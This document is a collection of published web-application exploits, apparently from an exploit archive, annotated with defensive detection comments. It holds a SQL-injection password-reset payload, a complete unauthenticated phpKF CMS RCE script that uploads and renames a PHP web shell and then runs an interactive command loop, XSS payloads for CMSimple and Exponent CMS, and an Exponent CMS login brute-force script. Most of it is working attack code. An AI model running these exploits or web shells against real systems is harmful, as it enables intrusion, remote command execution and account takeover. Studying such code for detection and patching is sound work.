# The "email" field is not an address but a SQL fragment: a closing quote followed by
# comment-separated OR clauses ("/**/or/**/user_id=1/**/or/**/"), so the lookup also matches
# user_id=1. Detection: an email parameter containing quote characters or "/**/" is never a
# legitimate address and is worth alerting on at the WAF or application log.
_p = "email=%27/**/or/**/user_id=1/**/or/**/'admin%40" + _domain + "&submit=justrandomvalue"
r = requests.post(url = _url, headers = headers, data = _p)
# A 200 only shows the handler accepted the form; mail delivery is not verified by this script.
if r.status_code == 200:
print('[+] Check your email, you are probably going to receive plaintext password which belongs to administrator.')
# Exploit Title: phpKF CMS 3.00 Beta y6 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 18/12/2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://www.phpkf.com/
# Software Link: https://www.phpkf.com/indirme.php
# Version: 3.00
# Category: Webapps
# Tested on: Linux/Windows
# phpKF-CMS is a very popular content management system for promotion, news, shopping, corporate, friends, blogs and more.
# Contains an endpoint that allows remote access
# The file upload mechanism does not perform the necessary checks; only the file extension is checked.
# A file with the ".png" extension can be uploaded and its extension changed afterwards.
# Example: python3 exploit.py -u http://example.com
# python3 exploit.py -u http://example.com -l admin -p Admin123
from bs4 import BeautifulSoup
from time import sleep
import requests
import argparse
import json
# Entry point: parses -u/--host (required) plus optional -l/--login and -p/--password,
# prints a banner, then hands the parsed namespace to host().
def main():
parser = argparse.ArgumentParser(description='phpKF-CMS 3.00 Beta y6 - Remote Code Execution (Unauthenticated)')
parser.add_argument('-u', '--host', type=str, required=True)
parser.add_argument('-l', '--login', type=str, required=False)
parser.add_argument('-p', '--password', type=str, required=False)
args = parser.parse_args()
print("\nphpKF-CMS 3.00 Beta y6 - Remote Code Execution (Unauthenticated)",
"\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
host(args)
# Normalises args.host (prepends "http://" when no scheme is given, strips one trailing "/"),
# then GETs the site root. On HTTP 200 it branches: no credentials supplied -> create_user(),
# otherwise -> login_user(). Any other status, or a connection error, is reported as unreachable.
# The "args.host = args.host" lines and the "else: pass" branches are no-ops.
def host(args):
#Check http or https
if args.host.startswith(('http://', 'https://')):
print("[?] Check Url...\n")
sleep(2)
args.host = args.host
if args.host.endswith('/'):
args.host = args.host[:-1]
else:
pass
else:
print("\n[?] Check Adress...\n")
sleep(2)
args.host = "http://" + args.host
args.host = args.host
if args.host.endswith('/'):
args.host = args.host[:-1]
else:
pass
# Check Host Status
try:
# No timeout is set on this request; a silently dropped connection will hang here.
response = requests.get(args.host)
if response.status_code == 200:
if args.login == None and args.password == None:
create_user(args)
else:
login_user(args)
else:
print("[-] Address not reachable!")
sleep(2)
except requests.ConnectionError as exception:
# "exception" is never used; only a generic message is printed before exiting with status 1.
print("[-] Address not reachable!")
sleep(2)
exit(1)
# Self-registers a fixed account ("evil" / "Evil123") through the public registration handler
# /phpkf-bilesenler/kayit_yap.php, then calls login_user() with those credentials.
# The registration response is never inspected, so a failed registration is only noticed at login.
# Detection note: the Referer is a hard-coded off-site value ("http://fuzzing.com/uye-kayit.php")
# rather than the target host, and the account name/e-mail are constants; both are usable log
# indicators for this PoC as published.
def create_user(args):
print("[*] Create User!\n")
sleep(2)
url = args.host + "/phpkf-bilesenler/kayit_yap.php"
headers = {
"Origin": args.host,
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
"Referer": "http://fuzzing.com/uye-kayit.php",
"Accept-Encoding": "gzip, deflate"
}
# Form field names are the application's Turkish identifiers (kullanici_adi = username,
# sifre = password, posta = e-mail, kosul = terms checkbox).
data = {
"kayit_yapildi_mi": "form_dolu",
"oturum": '', "kullanici_adi": "evil",
"sifre": "Evil123",
"sifre2": "Evil123",
"posta": "evil@localhost.com",
"kosul": "on"
}
response = requests.post(url, headers=headers, data=data, allow_redirects=True)
args.login = ("evil")
args.password = ("Evil123")
print("[+] " + args.login + ":" + args.password + "\n")
sleep(2)
login_user(args)
# Posts the credentials in args to /uye-giris.php. Success is judged solely by the presence of a
# "kullanici_kimlik" session cookie in the response; redirects are not followed so the Set-Cookie
# on the login redirect is captured. On success the cookie value is passed to upload_evil();
# otherwise a hint is printed (a more specific one when the auto-created account was used).
def login_user(args):
url = args.host + "/uye-giris.php"
headers = {
"Origin": args.host,
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": args.host + "/uye-giris.php",
"Accept-Encoding": "gzip, deflate"
}
data = {
"kayit_yapildi_mi": "form_dolu",
"git": args.host + "/index.php",
"kullanici_adi": args.login,
"sifre": args.password,
"hatirla": "on"
}
response = requests.post(url, headers=headers, data=data, allow_redirects=False)
# The session cookie is the only success signal used; the response body is ignored.
token = response.cookies.get("kullanici_kimlik")
if (token != None):
print("[!] Login Success!\n")
sleep(2)
upload_evil(args, token)
else:
if args.login == "evil" and args.password == "Evil123":
print("[!] Unauthorized user!\n")
print("[!] manually add a user and try again\n")
print("[!] Go to link " + args.host + "/uye-kayit.php\n")
print("python3 exploit.py -u '"+ args.host +"' -l 'attacker' -p 'p@ssW0rd'")
sleep(2)
else:
print("[!] Unauthorized user!\n")
sleep(2)
# Sends the raw request body (PHP source) to the upload component
# /phpkf-bilesenler/yukleme/index.php, with the file name carried in the custom "DOSYA-ADI"
# header as "evil.png". The server's literal reply "yuklendi" ("uploaded") is treated as success,
# after which change_name() is called with the same session cookie.
# Detection note: the upload only checks the extension named in DOSYA-ADI, so the mismatch between
# an image file name and a body starting with "<?php" is the condition to alert on server-side
# (content sniffing / magic-byte validation would reject this request).
def upload_evil(args, token):
url = args.host + "/phpkf-bilesenler/yukleme/index.php"
cookies = {
"kullanici_kimlik": token,
"dil": "en"
}
headers = {
"VERICEK": "",
"DOSYA-ADI": "evil.png",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
"Content-type": "application/x-www-form-urlencoded; charset=utf-8",
"Accept": "*/*",
"Origin": args.host,
"Referer": args.host + "/oi_yaz.php",
"Accept-Encoding": "gzip, deflate"
}
data = "<?php if(isset($_GET['cmd'])){ $cmd = ($_GET['cmd']); system($cmd); die; } ?>"
response = requests.post(url, headers=headers, cookies=cookies, data=data)
if (response.text == "yuklendi"):
print("[!] Upload Success!\n")
sleep(2)
change_name(args, token)
else:
print("[!] Upload Failed!\n")
sleep(2)
# Uses the same upload component's rename action ("yenidenadlandir" = rename) to turn the stored
# evil.png into evil.php; the extension check applied at upload time is not re-applied on rename.
# Success is the literal reply "Name successfully changed...", after which find_dict() is called.
# Detection note: a rename request whose target extension is server-executable (.php here) is the
# specific event a defender should block or alert on in this component.
def change_name(args, token):
url = args.host + "/phpkf-bilesenler/yukleme/index.php"
cookies = {
"kullanici_kimlik": token,
"dil": "en"
}
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
"Content-type": "application/x-www-form-urlencoded; charset=UTF-8",
"Accept": "*/*",
"Origin": args.host,
"Referer": args.host + "/oi_yaz.php",
"Accept-Encoding": "gzip, deflate"
}
data = {
"yenidenadlandir": "evil.png|evil.php",
"vericek": "/"
}
response = requests.post(url, headers=headers, cookies=cookies, data=data)
if (response.text == "Name successfully changed..."):
print("[!] Change Name evil.php!\n")
sleep(2)
find_dict(args, token)
else:
print("[!] Change Failed!\n")
sleep(2)
# Asks the upload component for a directory listing ("vericek": "/", "dds": "0") to learn the
# web path of the upload directory. The literal reply "You can not upload files!" is treated as
# "nothing found"; any other reply is parsed with BeautifulSoup and the second child of the first
# <div> (whitespace removed) is taken as the path and passed to exploit().
# Assumes the listing HTML has that exact shape; a different layout raises at the .contents[1] lookup.
def find_dict(args, token):
url = args.host + "/phpkf-bilesenler/yukleme/index.php"
cookies = {
"kullanici_kimlik": token,
"dil": "en"
}
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
"Content-type": "application/x-www-form-urlencoded; charset=UTF-8",
"Accept": "*/*",
"Origin": args.host,
"Referer": args.host + "/oi_yaz.php",
"Accept-Encoding": "gzip, deflate"
}
data = {
"vericek": "/",
"dds": "0"
}
response = requests.post(url, headers=headers, cookies=cookies, data=data)
if (response.text == "You can not upload files!"):
print("[!] File not found!\n")
sleep(2)
else:
print("[!] Find Vuln File!\n")
sleep(2)
soup = BeautifulSoup(response.text, 'html.parser')
path = soup.find("div").contents[1].replace(" ", "")
exploit(args, path)
# Interactive loop: each line read from stdin is appended unencoded to the "cmd" query parameter
# of <host><path>evil.php and the response body is printed. An empty body is reported as
# "command not found". There is no exit condition other than interrupting the script.
# Detection note: repeated requests to a freshly renamed .php file under the upload directory
# carrying a "cmd" parameter are the post-exploitation traffic to look for in access logs.
def exploit(args, path):
print("[+] Exploit Done!\n")
sleep(2)
while True:
cmd = input("$ ")
url = args.host + path + "evil.php?cmd=" + cmd
headers = {
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
}
response = requests.post(url, headers=headers, timeout=5)
if response.text == "":
print(cmd + ": command not found\n")
else:
print(response.text)
# Script entry guard.
if __name__ == '__main__':
main()
# Exploit Title: CMSimple 5.4 - Cross Site Scripting (XSS)
# Date: 22/10/2021
# Exploit Author: heinjame
# Vendor Homepage: https://www.cmsimple.org/en/
# Software Link: https://www.cmsimple.org/en/?Downloads
# Version: <=5.4
# Tested on: Linux os
[Description]
Since the application filters user input with preg_replace, an attacker is able to bypass the restriction by encoding the payload as HTML numeric character references.
As a result, an attacker can perform DOM-based XSS.
[Payload and POC]
File > images > Upload a file
Attack vector >> ')-alert(1)// (need to encode)>>
')-alert(1)//
When the victim clicks the delete button, an alert is executed.
Script to encode the payload
# Read one line from stdin and rewrite every character as an HTML numeric
# character reference (&#NNN;), then print the encoded string.
payload = input()
finalpayload = "".join("&#" + str(ord(ch)) + ";" for ch in payload)
print(finalpayload)
# Exploit Title: Exponent CMS 2.6 - Multiple Vulnerabilities
# Exploit Author: heinjame
# Date: 22/10/2021
# Exploit Author: picaro_o
# Vendor Homepage: https://www.exponentcms.org/
# Version: <=2.6
# Tested on: Linux os
*Stored XSS*
Affected parameter = >
http://127.0.0.1:8082/expcms/text/edit/id/{id}/src/@footer (Title,
Text Block)
Payload = <iframe/src="data:text/html,<svg onload=alert(1)>">
*Database credentials are disclosed in the response*
POC
```
// Quoted from the application's client-side code: opens the bundled Adminer console with the
// database server, username ("root") and database name embedded in the URL, so they are
// readable by anyone who can view this page's source. If the popup is blocked, err() is called.
var adminerwindow = function (){
var win =
window.open('/expcms/external/adminer/admin.php?server=localhost&username=root&db=exponentcms');
if (!win) { err(); }
}
```
*Authentication Bruteforce*
```
import argparse
import requests
import sys
# argparse is used only to enforce three positional arguments and print usage; the parsed
# namespace (pargs) is never read and the values are taken from sys.argv directly.
parser = argparse.ArgumentParser()
parser.add_argument("url", help="URL")
parser.add_argument("Username list", help="Username List")
parser.add_argument("Password list", help="Password List")
pargs = parser.parse_args()
host = sys.argv[1]
userlist = sys.argv[2]
passlist = sys.argv[3]
# Both word lists are opened at module level and left open for the script's lifetime;
# the bare except also masks errors other than a missing file.
try:
readuser = open(userlist)
readpass = open(passlist)
except:
print("Unable to load files")
exit()
# For each line of the username list, triggers the "send_new_password" action (multipart POST
# to /index.php) and then fetches /users/reset_password, treating the word "administrator" in
# that page as confirmation that the username exists. Returns (username, True) on the first
# match; if nothing matches the loop ends and the function returns None. The "break" after
# "return" is never reached.
# Detection note: each probe triggers a password-reset e-mail, so this enumeration is loud —
# a burst of send_new_password requests with varying usernames from one client is the signal.
def usernamebrute():
s = requests.Session()
for username in readuser.readlines():
brute={
'controller':(None,'users'),
'src':(None,''),
'int':(None,''),
'action':(None,'send_new_password'),
'username':(None,username.strip()),
}
bruteforce = s.post(host+"/index.php",files=brute)
status = s.get(host+"/users/reset_password")
if "administrator" in status.text:
print("[+] Found username : "+ username)
adminaccount = username
checkpoint = True
return adminaccount,checkpoint
break
# For each line of the password list, posts a login form to /index.php for adminaccount and then
# fetches /login/showlogin, treating the absence of "Invalid Username / Password" as success.
# As published, the s.get() call references a name "csrf" that this listing never defines.
# Detection note: the Content-Type header uses mixed-case spelling and an invalid media type
# ("...urlencoded1"); a header that does not match a registered media type is a cheap signature,
# as is a rapid series of login POSTs for one account from a single session.
def passwordbrute(adminaccount):
s = requests.Session()
s.cookies.set("csrftoken", "abc")
header = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0)
Gecko/20100101 Firefox/78.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'COntent-TYpE': 'applicatiOn/x-WWW-fOrm-urlencoded1',
'Referer': host+'/login/showlogin'
}
for password in readpass.readlines():
brute={
'controller':'login',
'src':'',
'int':'',
'action':'login',
'username':adminaccount,
'password':password.strip()
}
bruteforce = s.post(host+"/index.php",headers=header,data=brute)
# print(bruteforce.text)
status = s.get(host+"/login/showlogin",cookies=csrf)
print(status.text)
if "Invalid Username / Password" not in status.text:
print("[+] Found Password : "+ password)
break
# Driver: usernamebrute() returns a tuple only when a username matched; when it returns None
# this unpacking raises TypeError, so the "else" message below is never printed in that case.
adminaccount,checkpoint = usernamebrute()
if checkpoint == True:
passwordbrute(adminaccount)
else:
print("Can't find username,We can't proceed sorry :(")
```